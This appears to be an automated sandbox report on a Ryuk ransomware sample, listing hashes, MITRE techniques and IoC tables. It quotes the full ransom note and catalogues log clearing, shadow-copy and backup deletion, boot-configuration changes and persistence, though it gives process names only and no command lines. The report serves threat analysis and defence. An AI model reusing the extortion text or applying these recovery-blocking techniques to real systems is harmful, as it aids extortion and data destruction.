ryuk | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09

Analysis

max time kernel
150s
max time network
30s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
09/03/2023, 18:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
Size

885KB
MD5

6a5bf25ff4f72ebca91280ffda057260
SHA1

722063331acdbfc93ccbfacbec045800a835dd9e
SHA256

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA512

64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42
SSDEEP

12288:Qm+PiUwyM02Jl5YqWYgeWYg955/155/0QebUlAAsrsKCQoZRn6X:Q5iUtklagQKUKRrsKCQON6

Score

10^/10

ryuk discovery evasion ransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note

Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at [email protected] or [email protected] You will receive btc address for payment in the reply letter Ryuk No system is safe

Emails

[email protected]

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal on Host

T1070

pid	Process
884	wevtutil.exe
756	wevtutil.exe
668	wevtutil.exe
576	wevtutil.exe
824	wevtutil.exe
1292	wevtutil.exe
824	wevtutil.exe
1472	wevtutil.exe
1212	wevtutil.exe
1596	wevtutil.exe
364	wevtutil.exe
364	wevtutil.exe
1980	wevtutil.exe
280	wevtutil.exe
1896	wevtutil.exe
1040	wevtutil.exe
220	wevtutil.exe
1496	wevtutil.exe
452	wevtutil.exe
1228	wevtutil.exe
968	wevtutil.exe
1456	wevtutil.exe
1296	wevtutil.exe
228	wevtutil.exe
1812	wevtutil.exe
852	wevtutil.exe
1496	wevtutil.exe
576	wevtutil.exe
1100	wevtutil.exe
208	wevtutil.exe
204	wevtutil.exe
228	wevtutil.exe
1564	wevtutil.exe
1560	wevtutil.exe
1188	wevtutil.exe
1540	wevtutil.exe
1580	wevtutil.exe
2004	wevtutil.exe
1448	wevtutil.exe
1480	wevtutil.exe
224	wevtutil.exe
1768	wevtutil.exe
2040	wevtutil.exe
1220	wevtutil.exe
1476	wevtutil.exe
1480	wevtutil.exe
1876	wevtutil.exe
1964	wevtutil.exe
1884	wevtutil.exe
1364	wevtutil.exe
840	wevtutil.exe
1884	wevtutil.exe
1916	wevtutil.exe
220	wevtutil.exe
1752	wevtutil.exe
360	wevtutil.exe
428	wevtutil.exe
760	wevtutil.exe
1564	wevtutil.exe
220	wevtutil.exe
1976	wevtutil.exe
360	wevtutil.exe
1228	wevtutil.exe
852	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
2004	bcdedit.exe
1108	bcdedit.exe

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1896	wbadmin.exe

Disables Task Manager via registry modification
evasion
Disables taskbar notifications via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Drops startup file 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1480	icacls.exe

Enumerates connected drives 3 TTPs 40 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\A:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\R:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\T:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\Y:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\G:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\M:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\N:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\B:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\Z:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\F:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\I:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\U:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\V:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\E:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\P:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\O:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\Q:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\S:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\X:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\K:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\L:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\H:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\W:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\J:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened (read-only)	\??\F:	vssadmin.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\ProtectInitialize.rar.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\QUAD\QUAD.ELM.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_SlateBlue.gif.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152628.WMF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0217872.WMF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\form_edit.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jre7\lib\deploy\splash.gif.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0222015.WMF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Pushpin.eftx.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14792_.GIF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FLYERHM.POC.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\conticon.gif.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\com-sun-tools-visualvm-modules-startup.jar.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105398.WMF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup.xml.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ps.txt.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nassau.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\jawt.lib.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02261_.WMF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\reflow.api.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.RSD.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099172.WMF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18196_.WMF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21298_.GIF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Updater6\AdobeAUM_rootCert.cer.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ICE\ICE.ELM.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14830_.GIF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR9F.GIF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0285462.WMF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_zh_CN.jar.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RMNSQUE\PREVIEW.GIF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02263_.WMF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Installed_resources14.xss.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL097.XML.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\UpdateUnblock.mp2.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Srednekolymsk.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic_5.5.0.165303.jar.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00513_.WMF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Horizon.thmx.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jre7\lib\jfr\profile.jfc.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\vlc.mo.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099181.WMF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\TAB_OFF.GIF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR27F.GIF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107302.WMF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIGN.XML.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javafx.policy.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0195254.WMF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\viewSelectionChanged.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL107.XML.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-core-output2.xml_hidden.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02361_.WMF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\EXPSRV.DLL.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21320_.GIF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01607U.BMP.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\RyukReadMe.txt	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File created	C:\Windows\hrmlog1	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
968	sc.exe
364	sc.exe
1980	sc.exe
452	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
860	schtasks.exe
652	schtasks.exe
2024	schtasks.exe
1876	schtasks.exe
1736	schtasks.exe

Interacts with shadow copies 2 TTPs 15 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1872	vssadmin.exe
760	vssadmin.exe
220	vssadmin.exe
968	vssadmin.exe
1472	vssadmin.exe
668	vssadmin.exe
1296	vssadmin.exe
1804	vssadmin.exe
1920	vssadmin.exe
1896	vssadmin.exe
1480	vssadmin.exe
1408	vssadmin.exe
1496	vssadmin.exe
1760	vssadmin.exe
1168	vssadmin.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
1996	taskkill.exe
1408	taskkill.exe
1292	taskkill.exe
1716	taskkill.exe
1552	taskkill.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1652	NOTEPAD.EXE

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
